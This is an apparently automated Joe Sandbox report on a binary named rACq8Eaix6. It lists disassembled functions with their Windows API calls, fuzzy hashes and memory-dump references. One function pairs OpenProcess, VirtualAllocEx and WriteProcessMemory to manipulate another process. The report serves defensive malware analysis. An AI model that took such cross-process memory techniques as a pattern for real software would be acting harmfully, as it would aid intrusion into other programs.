Instruction Fuzzy Hash: 7F21BF75A10655AFCB149F398C08B6E3BA4FB05362F104729FD32D71E0E7309E958B94

Function 00C29307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C29320

Part of subcall function 00BD7BCC: _memmove.LIBCMT ref: 00BD7C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C29352
__itow.LIBCMT ref: 00C2936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C29392
__itow.LIBCMT ref: 00C293A3

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: c9dc3f2615fc4be1a590f4d769b7adf372b365f22b2a10cb833be299c5d7147c
Instruction ID: b87f4a2a75b77404e7fddada8042dd7f9c94713f2c40697d142c4bf89ed4ec9c
Opcode Fuzzy Hash: c9dc3f2615fc4be1a590f4d769b7adf372b365f22b2a10cb833be299c5d7147c
Instruction Fuzzy Hash: D721DA357402186BDB10DA659C89EEE7BE9EF48710F044069FD05E72E1EAB0CD4597A1

Function 00C45A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00C45A6E
GetForegroundWindow.USER32 ref: 00C45A85
GetDC.USER32(00000000), ref: 00C45AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00C45ACD
ReleaseDC.USER32(00000000,00000003), ref: 00C45B08

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: be0ac1a8750291ce754e5112bfd63093148f28f38c9a2ab8a502046f75e1559d
Instruction ID: 5d2ca2a00ecc966aea6f004ceed0699f6a9f5c47e7061a3380f3c7c5cef2032b
Opcode Fuzzy Hash: be0ac1a8750291ce754e5112bfd63093148f28f38c9a2ab8a502046f75e1559d
Instruction Fuzzy Hash: 1B21A139A00604AFD704EF65DC88BAEBBE5EF48351F148079F80997362DB70AD41DB90

Function 00BD12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BD134D
SelectObject.GDI32(?,00000000), ref: 00BD135C
BeginPath.GDI32(?), ref: 00BD1373
SelectObject.GDI32(?,00000000), ref: 00BD139C

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 4f4c739d5fee079ac6f898f235cb4fd3713f921f9430f35e9be97f84e496aa7a
Instruction ID: 479d8d612c13fa18e849c977bde67c36c7b69fe2091dea9f3622da615483b9ce
Opcode Fuzzy Hash: 4f4c739d5fee079ac6f898f235cb4fd3713f921f9430f35e9be97f84e496aa7a
Instruction Fuzzy Hash: 66214C30841708FFDB169F29DC4876DBBE8EB10722F18465BF810962E0E7719992DB98

Function 00C2BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00C2BCB3
_memcmp.LIBCMT ref: 00C2BCD1
_memcmp.LIBCMT ref: 00C2BCE4
_memcmp.LIBCMT ref: 00C2BCFC
_memcmp.LIBCMT ref: 00C2BD14

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: d7787efe11ed4d12bea93176560e02d02522a79620bd382a35ed9be3c85b5c30
Instruction ID: 02cc5a970eca33efd934477f91878f9f7ca658f9dbd1be23d89d71b09dfdedc3
Opcode Fuzzy Hash: d7787efe11ed4d12bea93176560e02d02522a79620bd382a35ed9be3c85b5c30
Instruction Fuzzy Hash: 2401F571200629BBE2106A1A7D82FFBB75CDE70398F044821FE1597783EB11EE1486A0

Function 00C34A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C34ABA
__beginthreadex.LIBCMT ref: 00C34AD8
MessageBoxW.USER32(?,?,?,?), ref: 00C34AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C34B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C34B0A

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: c104cede21195a9419f01155e0f27e1013c1c3513458ce9d5ac5b7258b81cd92
Instruction ID: 2ef9cdbf42bf5ee220b7f9b10b1ba926217a9f1be6893226b7576a80d65988f6
Opcode Fuzzy Hash: c104cede21195a9419f01155e0f27e1013c1c3513458ce9d5ac5b7258b81cd92
Instruction Fuzzy Hash: 79110476D05A09BBC7059FA8AC08BAF7FACEB45321F14426AF824E3260D671D94487A0

Function 00C28202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C2821E
GetLastError.KERNEL32(?,00C27CE2,?,?,?), ref: 00C28228
GetProcessHeap.KERNEL32(00000008,?,?,00C27CE2,?,?,?), ref: 00C28237
HeapAlloc.KERNEL32(00000000,?,00C27CE2,?,?,?), ref: 00C2823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C28255

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 561553ac9d9a2b8d5520069344857f57c5c8bf35c0b69e129e73c281d58992d8
Instruction ID: 89c4becf1e49334781c82b2cb30b86eff0ed1a57e79d89d6cab674c1c065e493
Opcode Fuzzy Hash: 561553ac9d9a2b8d5520069344857f57c5c8bf35c0b69e129e73c281d58992d8
Instruction Fuzzy Hash: 5201A974202724FFDB244FA6EC48E6F3BACEF8A352B10042DF808D3220DA318D41CA60

Function 00C2710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C27044,80070057,?,?,?,00C27455), ref: 00C27127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C27044,80070057,?,?), ref: 00C27142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C27044,80070057,?,?), ref: 00C27150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C27044,80070057,?), ref: 00C27160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C27044,80070057,?,?), ref: 00C2716C

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: db112b8aac75480c367d438442b084169d6974b7d3c29118fa5547b46a8a4aa9
Instruction ID: 0a9d967cb880c4f4fdb2853ff0ad5aa444ce1ab81678d79a974ef2a345efc01f
Opcode Fuzzy Hash: db112b8aac75480c367d438442b084169d6974b7d3c29118fa5547b46a8a4aa9
Instruction Fuzzy Hash: 7201D476600324BBDB104F24EC84BAE7BBCEF44752F100168FD08E2260D771DD918BA0

Function 00C35244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C35260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C3526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C35276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C35280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C352BC

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 58242091658c3069f671e64c5909229ad08357cf63c1c3b2acc5c2907b331ef4
Instruction ID: 006de5e0ae4778471c02d628eae3e111568a0224b1c6c76f0ccffb7c94d35554
Opcode Fuzzy Hash: 58242091658c3069f671e64c5909229ad08357cf63c1c3b2acc5c2907b331ef4
Instruction Fuzzy Hash: 61015735D11A1ADBCF04EFE4E849AEEBB78BB08312F40005AE941F2190CB3155918BA1

Function 00C2810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C28121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C2812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C2813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C28141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C28157

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: a00a8d9dbce203e2c3fffc8643093f63ea3e5ee65a95c982a42a7fa8ead3081a
Instruction ID: b8d4eac8967ca889261a6f5d7f0f1c2fc3682e6a699d22c3893614bbfee8f2f0
Opcode Fuzzy Hash: a00a8d9dbce203e2c3fffc8643093f63ea3e5ee65a95c982a42a7fa8ead3081a
Instruction Fuzzy Hash: A7F0C274202324AFEB110FA4EC8DF6F3BACFF89755B000029F985D31A0CB609D96DA60

Function 00C2C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00C2C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 00C2C20E
MessageBeep.USER32(00000000), ref: 00C2C226
KillTimer.USER32(?,0000040A), ref: 00C2C242
EndDialog.USER32(?,00000001), ref: 00C2C25C

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: acfbf9c7e22472355af46f914c6309fe12acc09db41a4ba4f712b508de6cbc13
Instruction ID: e433b71fc6852d6f3d8c5f3580675d5b2d7ca5c10103812937e315487148e00c
Opcode Fuzzy Hash: acfbf9c7e22472355af46f914c6309fe12acc09db41a4ba4f712b508de6cbc13
Instruction Fuzzy Hash: D901A234404714EBEB246B60ED8EF9A77B8BF00B06F00026EB552A18E1DFE469858B90

Function 00BD13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00BD13BF
StrokeAndFillPath.GDI32(?,?,00C0B888,00000000,?), ref: 00BD13DB
SelectObject.GDI32(?,00000000), ref: 00BD13EE
DeleteObject.GDI32 ref: 00BD1401
StrokePath.GDI32(?), ref: 00BD141C

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 33a5e4e526c746cde76117a3e6a932846a69fb0d7dcf0d8c7a50b513a56f9d8d
Instruction ID: ae863d08d982d010aa3e906ef8d89eb26698234c7921f5ecfce82ce0c87cef55
Opcode Fuzzy Hash: 33a5e4e526c746cde76117a3e6a932846a69fb0d7dcf0d8c7a50b513a56f9d8d
Instruction Fuzzy Hash: 32F03734041B08EBDB169F2AEC4C75C7FE4EB40326F08826AE429992F1D73189D6DF18

Function 00BE2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00BF0DB6: std::exception::exception.LIBCMT ref: 00BF0DEC
Part of subcall function 00BF0DB6: __CxxThrowException@8.LIBCMT ref: 00BF0E01

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

Part of subcall function 00BD7A51: _memmove.LIBCMT ref: 00BD7AAB

__swprintf.LIBCMT ref: 00BE2ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00BE2D66

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 34f67cafc26285da9dbd245a7064c8d9efa203ce5b6227fcc36e0d695f0b9733
Instruction ID: f781f0797b603e2462c77f36ceb8bafa72f8d85c0b4bc8a9b2ba85bb93814d0a
Opcode Fuzzy Hash: 34f67cafc26285da9dbd245a7064c8d9efa203ce5b6227fcc36e0d695f0b9733
Instruction Fuzzy Hash: C1918D71508255AFC714EF24C895CBEB7E8EF85710F00099EF8569B2A1EB30EE48DB52

Function 00C3B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BD4743,?,?,00BD37AE,?), ref: 00BD4770

CoInitialize.OLE32(00000000), ref: 00C3B9BB
CoCreateInstance.OLE32(00C62D6C,00000000,00000001,00C62BDC,?), ref: 00C3B9D4
CoUninitialize.OLE32 ref: 00C3B9F1

Part of subcall function 00BD9837: __itow.LIBCMT ref: 00BD9862
Part of subcall function 00BD9837: __swprintf.LIBCMT ref: 00BD98AC

Strings

.lnk, xrefs: 00C3B99D, 00C3B9AB

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: d60d9288d57b5a5da0ee2c77f1a4c67a750702e76baa35e8ef18711e6db4936d
Instruction ID: 4976df9152627d86d3eb0ee1b1157d05a2cd4ddcf1064c68855624da49bbbfaa
Opcode Fuzzy Hash: d60d9288d57b5a5da0ee2c77f1a4c67a750702e76baa35e8ef18711e6db4936d
Instruction Fuzzy Hash: C1A176756043019FCB10DF14C884E6ABBE5FF89314F048999F9AA9B3A1DB31ED46CB91

Function 00BF501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00BF50AD

Part of subcall function 00C000F0: __87except.LIBCMT ref: 00C0012B

Strings

pow, xrefs: 00BF5085, 00BF50A2

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 0aa47faf885304b6e490de1ec19bea1052858d592140dbdb6ccdabf14df51892
Instruction ID: 55e465e48d475a1dc06f12f4803aa74dcdebd37dadb507b516ac83918ce4dd00
Opcode Fuzzy Hash: 0aa47faf885304b6e490de1ec19bea1052858d592140dbdb6ccdabf14df51892
Instruction Fuzzy Hash: 4B515A7190890A96DB316724C94537E2BD4EB40700F318ED9E6E5872E9DF348ECCEA86

Function 00BE6192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BE6248
_memmove.LIBCMT ref: 00BE62E4
_memset.LIBCMT ref: 00BE6308

Strings

ERCP, xrefs: 00BE61B3

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 278d8df9f68e42c4785742e96e5695ff66e365ea299aea9bf63780b690dae865
Instruction ID: 38e8f29391c20fe59a2b6d30c5ff46b477ee8ecb1200b9a8bfa60da4ec9c19be
Opcode Fuzzy Hash: 278d8df9f68e42c4785742e96e5695ff66e365ea299aea9bf63780b690dae865
Instruction Fuzzy Hash: 8351C2B0900709DBDB24DF66C8817AAB7F4FF14344F2485AEE94AD7251E770EA44CB44

Function 00C297F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C29296,?,?,00000034,00000800,?,00000034), ref: 00C314E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C2983F

Part of subcall function 00C31487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C314B1

Part of subcall function 00C313DE: GetWindowThreadProcessId.USER32(?,?), ref: 00C31409
Part of subcall function 00C313DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C2925A,00000034,?,?,00001004,00000000,00000000), ref: 00C31419
Part of subcall function 00C313DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C2925A,00000034,?,?,00001004,00000000,00000000), ref: 00C3142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C298AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C298F9

Strings

@, xrefs: 00C29911

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 308e728d5c07f7a6716c4f2e454b72035107b9d504aa3f72f5c4f904056fe0d3
Instruction ID: bdfa443973c3f50adc38865b2081e99891185ef9a6f7df275078fed9f1250f6e
Opcode Fuzzy Hash: 308e728d5c07f7a6716c4f2e454b72035107b9d504aa3f72f5c4f904056fe0d3
Instruction Fuzzy Hash: 55415C7690122CAFCB10DFA4CD81ADEBBB8EB09300F044099FA55B7191DA716F85DBA1

Function 00C57946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C5F910,00000000,?,?,?,?), ref: 00C579DF
